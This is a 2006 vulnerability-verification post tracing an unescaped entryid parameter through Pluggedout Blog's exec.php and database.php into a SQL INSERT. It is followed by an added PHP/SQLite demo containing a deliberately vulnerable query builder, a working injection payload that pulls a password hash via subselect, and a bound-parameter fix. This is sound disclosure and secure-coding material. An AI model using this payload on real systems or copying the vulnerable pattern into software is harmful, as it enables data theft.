[VIM] VERIFY Pluggedout Blog 1.9.9c exec.php SQL injection
Steven M. Christey
coley at mitre.org
Mon Feb 6 18:14:25 EST 2006
Downloaded 1.9.9c as referenced here:
http://www.pluggedout.com/development/forums/viewtopic.php?t=831
I verified the SQL injection via source inspection.
In database.php, $entryid in db_sql_comment_add() is not escaped:
> function db_sql_comment_add($entryid,$name,$email,$url,$comment){
...
> $name = mysql_escape_string(strip_tags($name));
> $email = mysql_escape_string(strip_tags($email));
> $url = mysql_escape_string(strip_tags($url));
> $comment = mysql_escape_string(strip_tags($comment));
...
> $sql = "INSERT INTO ".$db_prefix."comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)"
> ." VALUES (".$entryid.",'".$name."','".$email."','".$url."','".$comment."',now())";
In exec.php:
> function comment_add($entryid,$name="",$email="",$url="",$comment=""){
...
> $sql = db_sql_comment_add($entryid,$name,$email,$url,$comment);
So, if we control the 1st argument to comment_add() we are set.
Later in exec.php:
> switch ($_GET["action"]){
> case "comment_add":
> $result = comment_add($_REQUEST["entryid"],$_REQUEST["name"],$_REQUEST["email"],$_REQUEST["url"],$_REQUEST["comment"]);
So we have $_REQUEST["entryid"] added unquoted into a SQL query.
Note: other code in the same file seems to use $_REQUEST["entryid"] as well.
- Steve
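The pattern described in the message above, reproduced as an added example that is not Pluggedout code and not part of the original post. It rebuilds the comment INSERT with the same column list in a throwaway in-memory SQLite database through PDO (assumes the pdo_sqlite extension is loaded), uses addslashes() as a stand-in for mysql_escape_string(), and then shows a bound-parameter version of the same insert. The users table, its uPassHash column, the payload string, and the function names escape_like_mysql() and fixed_comment_add() are all constructed for this demo and are not taken from Pluggedout.

```php
<?php
// Added example, not Pluggedout code. Schema, the hypothetical users table,
// the payload and the helper names are constructed for this demo.

$db = new PDO('sqlite::memory:');   // assumes pdo_sqlite is available
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE comments (nEntryId INTEGER, cName TEXT, cEMail TEXT,"
        . " cURL TEXT, cComment TEXT, dAdded TEXT)");
$db->exec("CREATE TABLE users (uName TEXT, uPassHash TEXT)");   // hypothetical table
$db->exec("INSERT INTO users VALUES ('admin', 'secret-hash')"); // constructed row

// Stand-in for mysql_escape_string(): escapes quotes and backslashes, which is
// the protection the report shows being applied to every argument except $entryid.
function escape_like_mysql(string $s): string {
    return addslashes(strip_tags($s));
}

// Same shape as db_sql_comment_add() in the report: $entryid is concatenated
// into the VALUES list unquoted and unescaped, the string fields are escaped.
function vulnerable_comment_sql($entryid, $name, $email, $url, $comment): string {
    $name    = escape_like_mysql($name);
    $email   = escape_like_mysql($email);
    $url     = escape_like_mysql($url);
    $comment = escape_like_mysql($comment);
    return "INSERT INTO comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)"
         . " VALUES (" . $entryid . ",'" . $name . "','" . $email . "','"
         . $url . "','" . $comment . "',datetime('now'))";
}

// Hardened version: the id must be a plain integer and every value is bound,
// so no user-controlled byte ever becomes part of the SQL text.
function fixed_comment_add(PDO $db, $entryid, $name, $email, $url, $comment): bool {
    if (!ctype_digit((string)$entryid)) {
        return false;   // reject anything that is not a bare decimal integer
    }
    $stmt = $db->prepare("INSERT INTO comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)"
                       . " VALUES (:id,:name,:email,:url,:comment,datetime('now'))");
    return $stmt->execute([
        ':id'      => (int)$entryid,
        ':name'    => strip_tags($name),
        ':email'   => strip_tags($email),
        ':url'     => strip_tags($url),
        ':comment' => strip_tags($comment),
    ]);
}

// Constructed payload for the unquoted nEntryId slot: it supplies the remaining
// columns itself, puts a subselect into cComment, closes the VALUES list and
// comments out the legitimate tail that the application appends.
$payload = "1,'x','x','x',(SELECT uPassHash FROM users LIMIT 1),datetime('now')) -- ";

// Vulnerable path: the escaped string fields are irrelevant because the
// injection point is outside any quotes.
$db->exec(vulnerable_comment_sql($payload, "n", "e", "u", "c"));
$leaked = $db->query("SELECT cComment FROM comments")->fetchColumn();
echo "vulnerable: cComment now holds: " . $leaked . "\n";

// Hardened path: the payload is refused, a real id is accepted and bound.
var_dump(fixed_comment_add($db, $payload, "n", "e", "u", "c"));
var_dump(fixed_comment_add($db, "42", "n", "e", "u", "c"));
```

Running it shows the comment row filled with the value read from the hypothetical users table, which is the point of the report: escaping the quoted string arguments does nothing for a value that is spliced into the query unquoted, so the fix is to validate and bind the integer rather than to escape it. The ctype_digit() check is stricter than an (int) cast on its own, which would silently turn "1 OR 1=1" into 1 and hide the attempt instead of rejecting it.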